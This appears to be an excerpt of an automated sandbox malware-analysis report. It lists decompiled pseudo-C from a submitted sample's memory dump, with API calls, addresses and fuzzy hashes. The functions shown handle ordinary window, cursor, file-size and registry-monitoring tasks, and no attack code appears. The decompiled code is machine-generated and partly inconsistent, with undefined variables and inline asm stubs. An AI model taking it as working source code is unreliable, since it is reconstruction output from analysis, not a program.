				if( *0x49eb58 != 0) {
					_t37 =  *0x49eb48; // 0x0
					_t38 = GetDesktopWindow();
					_t39 =  *0x49eb58; // 0x0
					E00443038(_t39, _t38, _t85, _t37);
				}
				_t35 = L00403BBC(1);
				 *0x49eb60 = _t35;
				if( *0x49eb54 != 0) {
					_t35 = E00438E8C(0x49eb44, 1);
				}
				return _t35;
			}


























                                                    0x0043915c
                                                    0x0043915f
                                                    0x00439162
                                                    0x00439164
                                                    0x00439166
                                                    0x00439168
                                                    0x0043916e
                                                    0x00439175
                                                    0x0043917d
                                                    0x00439182
                                                    0x00439187
                                                    0x0043918d
                                                    0x00439190
                                                    0x00439196
                                                    0x0043919e
                                                    0x004391a3
                                                    0x004391ad
                                                    0x004391b2
                                                    0x004391ba
                                                    0x004391c7
                                                    0x00439259
                                                    0x0043925b
                                                    0x00439266
                                                    0x0043925d
                                                    0x0043925d
                                                    0x0043925d
                                                    0x004391cd
                                                    0x004391cd
                                                    0x004391cf
                                                    0x004391cf
                                                    0x004391d5
                                                    0x004391db
                                                    0x004391fd
                                                    0x004391ff
                                                    0x00439202
                                                    0x004391dd
                                                    0x004391e2
                                                    0x004391e5
                                                    0x004391ed
                                                    0x004391f1
                                                    0x004391f5
                                                    0x004391f7
                                                    0x004391fa
                                                    0x004391fa
                                                    0x00439208
                                                    0x0043920f
                                                    0x00439234
                                                    0x00439236
                                                    0x00439239
                                                    0x00439211
                                                    0x00439211
                                                    0x00439218
                                                    0x0043921b
                                                    0x00439224
                                                    0x00439228
                                                    0x0043922c
                                                    0x0043922e
                                                    0x00439231
                                                    0x00439231
                                                    0x0043923e
                                                    0x00439250
                                                    0x00439240
                                                    0x00439240
                                                    0x0043924b
                                                    0x0043924b
                                                    0x0043923e
                                                    0x0043926d
                                                    0x00439277
                                                    0x0043927c
                                                    0x00439283
                                                    0x00439285
                                                    0x0043928b
                                                    0x00439298
                                                    0x0043929d
                                                    0x0043929d
                                                    0x004392a9
                                                    0x004392ae
                                                    0x004392ba
                                                    0x004392c1
                                                    0x004392c1
                                                    0x004392cb

                                                    APIs
                                                    • GetCursorPos.USER32(0049EB44), ref: 0043917D
                                                    • GetCursor.USER32(0049EB44), ref: 00439199
                                                      • Part of subcall function 00438388: SetCapture.USER32(00000000,?,004391AD,0049EB44), ref: 00438397
                                                    • GetDesktopWindow.USER32 ref: 0043928B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cursor$CaptureDesktopWindow
                                                    • String ID: `C
                                                    • API String ID: 669539147-1847193361
                                                    • Opcode ID: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                    • Instruction ID: c6ff30aa0831a605475be7d7daa41799f87f77b36a22a6f0c8b6adc85e5341f0
                                                    • Opcode Fuzzy Hash: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                    • Instruction Fuzzy Hash: D441BE716096009FD304DF2ED948616BBE1FB88310F1989BFE44A8B3A1DB75EC41CB4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004412BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004412BC(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
				char _t23;
				struct HWND__* _t42;
				void* _t43;
				intOrPtr _t47;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				 *((intOrPtr*)(_t59 + 4)) = __ecx;
				 *_t59 = __edx;
				_t54 = __eax;
				_t42 =  *(__eax + 0x180);
				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
					_t23 = 0;
				} else {
					_t23 = 1;
				}
				 *((char*)(_t59 + 8)) = _t23;
				if( *((char*)(_t59 + 8)) != 0) {
					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
				}
				_t56 = E0043E434(_t54) - 1;
				if(_t56 < 0) {
					L14:
					return E0043DFC4();
				} else {
					_t57 = _t56 + 1;
					_t58 = 0;
					do {
						_t43 = E0043E3F8(_t54, _t58);
						_t47 =  *0x437498; // 0x4374e4
						if(L00403D78(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
						} else {
							if( *((char*)(_t59 + 8)) == 0) {
								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
							}
						}
						_t58 = _t58 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					goto L14;
				}
			}












                                                    0x004412c3
                                                    0x004412c7
                                                    0x004412ca
                                                    0x004412cc
                                                    0x004412d4
                                                    0x004412e0
                                                    0x004412e4
                                                    0x004412e4
                                                    0x004412e4
                                                    0x004412e6
                                                    0x004412ef
                                                    0x00441306
                                                    0x00441306
                                                    0x00441314
                                                    0x00441317
                                                    0x00441385
                                                    0x00441393
                                                    0x00441319
                                                    0x00441319
                                                    0x0044131a
                                                    0x0044131c
                                                    0x00441325
                                                    0x00441329
                                                    0x00441336
                                                    0x00441344
                                                    0x0044134b
                                                    0x00441350
                                                    0x00441355
                                                    0x0044137c
                                                    0x0044137c
                                                    0x00441355
                                                    0x00441381
                                                    0x00441382
                                                    0x00441382
                                                    0x00000000
                                                    0x0044131c

                                                    APIs
                                                    • IsWindowVisible.USER32 ref: 004412D7
                                                    • ScrollWindow.USER32 ref: 00441306
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044137C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ScrollVisible
                                                    • String ID: tC
                                                    • API String ID: 4127837035-1085749316
                                                    • Opcode ID: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                    • Instruction ID: d3335ac6ad808ac153b7fdabc62b5b7bad948aac8996c4e76790ef358f9a02f4
                                                    • Opcode Fuzzy Hash: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                    • Instruction Fuzzy Hash: AA219F71704700AFE710DF6AC880B6B77D4AF88754F14856EFA48CB262D738EC45875A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047D01C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00000000,0047D0D2), ref: 0047D05E
                                                    • GetFileSize.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000), ref: 0047D096
                                                    • CloseHandle.KERNEL32(?,0047D0BC,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 0047D0AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleSize
                                                    • String ID: lI
                                                    • API String ID: 1378416451-2224401619
                                                    • Opcode ID: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                    • Instruction ID: 286afb8c99021898e2bdb5b6e8095afefc1f981a6a11c4acb5445e704e613de7
                                                    • Opcode Fuzzy Hash: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                    • Instruction Fuzzy Hash: D6117970A04204BFEB11DBA9CC52F5AB7B8EB09704F5184B6FA14E76D0DA79AD108A18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00494694 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00494694(void* __eax) {
				long _t18;
				void* _t20;
				void* _t21;

				_t21 = __eax;
				 *((intOrPtr*)(__eax + 0x48)) = 5;
				 *(_t21 + 0x50) = CreateEventA(0, 0xffffffff, 0, 0);
				 *((intOrPtr*)(_t21 + 0x4c)) = CreateEventA(0, 0xffffffff, 0, 0);
				asm("cmc");
				asm("sbb eax, eax");
				_t18 = RegNotifyChangeKeyValue( *( *((intOrPtr*)(_t21 + 0x40)) + 4),  *(_t21 + 0x44),  *(_t21 + 0x48),  *(_t21 + 0x50), 0xffffffff);
				if(_t18 != 0) {
					_t20 = E0040D144("Can not start monitoring", 1);
					E00404378();
					return _t20;
				}
				return _t18;
			}






                                                    0x00494695
                                                    0x00494697
                                                    0x004946ab
                                                    0x004946bb
                                                    0x004946cf
                                                    0x004946d0
                                                    0x004946da
                                                    0x004946e1
                                                    0x004946ef
                                                    0x004946f4
                                                    0x00000000
                                                    0x004946f4
                                                    0x004946fa

                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946A6
                                                    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946B6
                                                    • RegNotifyChangeKeyValue.ADVAPI32(?,?,00000005,?,000000FF,00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946DA
                                                    Strings
                                                    • Can not start monitoring, xrefs: 004946E3
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateEvent$ChangeNotifyValue
                                                    • String ID: Can not start monitoring
                                                    • API String ID: 2233126570-3835272546
                                                    • Opcode ID: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                    • Instruction ID: 443d9707a36d2025ed6040a5d28f1c7387ed03c1380d4d8ed495eb8cf4c6426e
                                                    • Opcode Fuzzy Hash: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                    • Instruction Fuzzy Hash: 02F0F4B06442016FDB54DFADCC85F1537A46F05715F1102A5FB14DF2D6E675DC048714
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00442ECC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00442ECC(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t19;
				struct HWND__* _t20;
				intOrPtr* _t23;

				_t20 = __eax;
				_t1 =  &_a4; // 0x443144
				_t23 =  *_t1;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 =  &_v12; // 0x443144
				ClientToScreen(__eax, _t4);
				GetWindowRect(_t20,  &_v28);
				_t6 =  &_v12; // 0x443144
				 *_t23 =  *_t6 - _v28.left;
				_t19 = _v8 - _v28.top;
				 *((intOrPtr*)(_t23 + 4)) = _t19;
				return _t19;
			}









                                                    0x00442ed4
                                                    0x00442ed6
                                                    0x00442ed6
                                                    0x00442ed9
                                                    0x00442edc
                                                    0x00442edf
                                                    0x00442ee4
                                                    0x00442eee
                                                    0x00442ef3
                                                    0x00442ef9
                                                    0x00442efe
                                                    0x00442f01
                                                    0x00442f09

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClientRectScreenWindow
                                                    • String ID: D1D$D1D
                                                    • API String ID: 3371951266-2689743835
                                                    • Opcode ID: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                    • Instruction ID: 696a0ad0a36b5a628bc16ef9a9fef7e4a028d98c1b31806480246e0535002fd9
                                                    • Opcode Fuzzy Hash: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                    • Instruction Fuzzy Hash: 4DF0A2B5D0420DAFCB00DFE9C9818DEFBFCEB08250F10456AA945F3741E630AA408BA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040E884 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040E884() {
				_Unknown_base(*)()* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x49b158 = _t1;
				}
				if( *0x49b158 == 0) {
					_t2 =  &M00409ED4;
					 *0x49b158 = _t2;
					return _t2;
				}
				return _t1;
			}






                                                    0x0040e88a
                                                    0x0040e88f
                                                    0x0040e893
                                                    0x0040e89b
                                                    0x0040e8a0
                                                    0x0040e8a0
                                                    0x0040e8ac
                                                    0x0040e8ae
                                                    0x0040e8b3
                                                    0x00000000
                                                    0x0040e8b3
                                                    0x0040e8b9

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F2ED,00000000,0040F300), ref: 0040E88A
                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E89B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                    • API String ID: 1646373207-3712701948
                                                    • Opcode ID: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                    • Instruction ID: 06fc51cb68962c5c382d4d7a2f86af93b26a51ec458fff072f92dd4ff1898c2b
                                                    • Opcode Fuzzy Hash: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                    • Instruction Fuzzy Hash: CFD09E62A043C55AF700BBA6A9EA7162658D720344B24C83BA000773D2D7FD4C94979D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00438E8C Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00438E8C(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x49eb54 != 0) {
					L3:
					_t49 =  *0x49eb34; // 0x0
					_t50 =  *0x49eb34; // 0x0
					_t117 = E00438D6C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x49eb54 == 0) {
						_t168 =  *0x49eb58;
						if( *0x49eb58 != 0) {
							_t106 =  *0x49eb48; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x49eb58; // 0x0
							E00443038(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x49eb34; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x49eb54;
						_t6 =  &_v24;
						 *_t6 =  *0x49eb54 != 0;
						__eflags =  *_t6;
						 *0x49eb54 = 2;
					} else {
						 *0x49eb54 = 1;
						_v24 = 0;
					}
					_t54 =  *0x49eb38; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x49eb38; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x49eb38; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x49eb38; // 0x0
							E0043AAC0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x49eb38; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E00438DBC(2);
						_t121 =  *_t155;
						_t60 =  *0x49eb38; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x49eb58 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x49eb58; // 0x0
								E00443020(_t82, _t158);
								_t84 =  *0x49eb58; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x49eb58; // 0x0
									E00443120(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x49eb58; // 0x0
									E00443038(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x49eb58; // 0x0
								E00443194(_t91, _t131, __eflags);
								_t93 =  *0x49de0c; // 0x49ebbc
								SetCursor(E004586EC( *_t93, _t158));
							}
						}
						_t62 =  *0x49de0c; // 0x49ebbc
						_t65 = SetCursor(E004586EC( *_t62, _t158));
						if( *0x49eb54 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00438DF8(_t121);
								_t67 =  *0x49eb38; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E0043AAC0(_t118,  &_v24, _t155);
									_t65 = L00403DE8(_t118, __eflags);
									_t135 =  *0x49eb38; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x49eb38; // 0x0
									_t65 = L00403DE8( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x49eb38; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x49eb38; // 0x0
								_t65 = L00403DE8( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x49eb38 == 0) {
								goto L32;
							} else {
								_t119 =  *0x49eb38; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00408E50(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x49eb38; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x49eb38; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x49eb38; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E00438DBC(1);
					if( *0x49eb38 == 0) {
						goto L32;
					}
					_t102 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E00438DBC(0);
					if( *0x49eb38 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x49eb44; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x49eb50; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x49eb48; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x49eb50; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                                    0x00438e92
                                                    0x00438e9b
                                                    0x00438eca
                                                    0x00438eca
                                                    0x00438ed0
                                                    0x00438ee6
                                                    0x00438eef
                                                    0x00438ef1
                                                    0x00438ef8
                                                    0x00438efa
                                                    0x00438f00
                                                    0x00438f0d
                                                    0x00438f12
                                                    0x00438f12
                                                    0x00438ef8
                                                    0x00438f17
                                                    0x00438f23
                                                    0x00438f33
                                                    0x00438f3a
                                                    0x00438f3a
                                                    0x00438f3a
                                                    0x00438f3f
                                                    0x00438f25
                                                    0x00438f25
                                                    0x00438f2c
                                                    0x00438f2c
                                                    0x00438f46
                                                    0x00438f4e
                                                    0x00438f9b
                                                    0x00438f9b
                                                    0x00438fa2
                                                    0x00438fa8
                                                    0x00438fab
                                                    0x00438fb4
                                                    0x00438fbc
                                                    0x00438fc4
                                                    0x00438fc9
                                                    0x00438fd2
                                                    0x00438fd9
                                                    0x00438fd9
                                                    0x00438fe7
                                                    0x00438fe9
                                                    0x00438feb
                                                    0x00438ff5
                                                    0x00438ffe
                                                    0x00439002
                                                    0x0043900c
                                                    0x00439011
                                                    0x00439016
                                                    0x0043901b
                                                    0x0043901f
                                                    0x0043903a
                                                    0x0043903f
                                                    0x00439044
                                                    0x00439021
                                                    0x00439025
                                                    0x0043902c
                                                    0x0043902e
                                                    0x00439033
                                                    0x00439033
                                                    0x0043904b
                                                    0x0043904b
                                                    0x00439050
                                                    0x00439058
                                                    0x00439065
                                                    0x00439065
                                                    0x00439002
                                                    0x0043906d
                                                    0x0043907a
                                                    0x00439086
                                                    0x00439159
                                                    0x00439159
                                                    0x0043908c
                                                    0x0043908c
                                                    0x0043908e
                                                    0x004390af
                                                    0x004390b1
                                                    0x004390b6
                                                    0x004390b9
                                                    0x004390bb
                                                    0x004390e9
                                                    0x004390f8
                                                    0x004390fd
                                                    0x00439103
                                                    0x004390bd
                                                    0x004390c5
                                                    0x004390d1
                                                    0x004390d6
                                                    0x004390dc
                                                    0x004390dc
                                                    0x00439090
                                                    0x00439093
                                                    0x00439096
                                                    0x004390a3
                                                    0x004390a3
                                                    0x0043910d
                                                    0x00000000
                                                    0x0043910f
                                                    0x0043910f
                                                    0x00439115
                                                    0x00439118
                                                    0x00439120
                                                    0x00439127
                                                    0x00000000
                                                    0x00000000
                                                    0x0043912e
                                                    0x00439130
                                                    0x00439137
                                                    0x00439137
                                                    0x0043913a
                                                    0x00439141
                                                    0x00439144
                                                    0x0043914f
                                                    0x00439150
                                                    0x00439151
                                                    0x00439152
                                                    0x00000000
                                                    0x00439152
                                                    0x0043910d
                                                    0x00439086
                                                    0x00438f52
                                                    0x00438f5e
                                                    0x00000000
                                                    0x00000000
                                                    0x00438f64
                                                    0x00438f69
                                                    0x00438f6c
                                                    0x00438f74
                                                    0x00438f77
                                                    0x00438f7e
                                                    0x00438f84
                                                    0x00438f89
                                                    0x00438f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00438f95
                                                    0x00438e9d
                                                    0x00438ea4
                                                    0x00438ea9
                                                    0x00438eaf
                                                    0x00000000
                                                    0x00000000
                                                    0x00438eb1
                                                    0x00438eb9
                                                    0x00438ebc
                                                    0x00438ebe
                                                    0x00438ec4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00438F00
                                                    • GetDesktopWindow.USER32 ref: 00439025
                                                    • SetCursor.USER32(00000000), ref: 0043907A
                                                      • Part of subcall function 00443194: 739F1770.COMCTL32(00000000,?,00439055), ref: 004431B0
                                                      • Part of subcall function 00443194: ShowCursor.USER32(000000FF,00000000,?,00439055), ref: 004431CB
                                                    • SetCursor.USER32(00000000), ref: 00439065
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cursor$DesktopWindow$F1770Show
                                                    • String ID:
                                                    • API String ID: 197431414-0
                                                    • Opcode ID: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                    • Instruction ID: 7774f5f5771a5045a1e06358bb4aae0e40f1de296239ba1c3ef58bb47b11143b
                                                    • Opcode Fuzzy Hash: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                    • Instruction Fuzzy Hash: 8C919174606241DFE704DF2AD885A06B7F1BB69314F14907BE4069B3A2CB78FC85CB4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004107F0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E004107F0(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F78C();
							E00410638(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F794();
							E00410638(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E00410794(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E00410764(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040F79C();
						E00410638(_v780);
						E004109E8(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040F320();
				return E00410638(_v776);
			}






















                                                    0x004107fc
                                                    0x0041080c
                                                    0x00410813
                                                    0x00410813
                                                    0x0041081e
                                                    0x0041082c
                                                    0x0041083b
                                                    0x00410859
                                                    0x0041083d
                                                    0x00410848
                                                    0x00410848
                                                    0x00410868
                                                    0x00410874
                                                    0x00410877
                                                    0x00410879
                                                    0x0041087a
                                                    0x0041087c
                                                    0x00410882
                                                    0x00410884
                                                    0x00410893
                                                    0x00410894
                                                    0x0041089e
                                                    0x0041089f
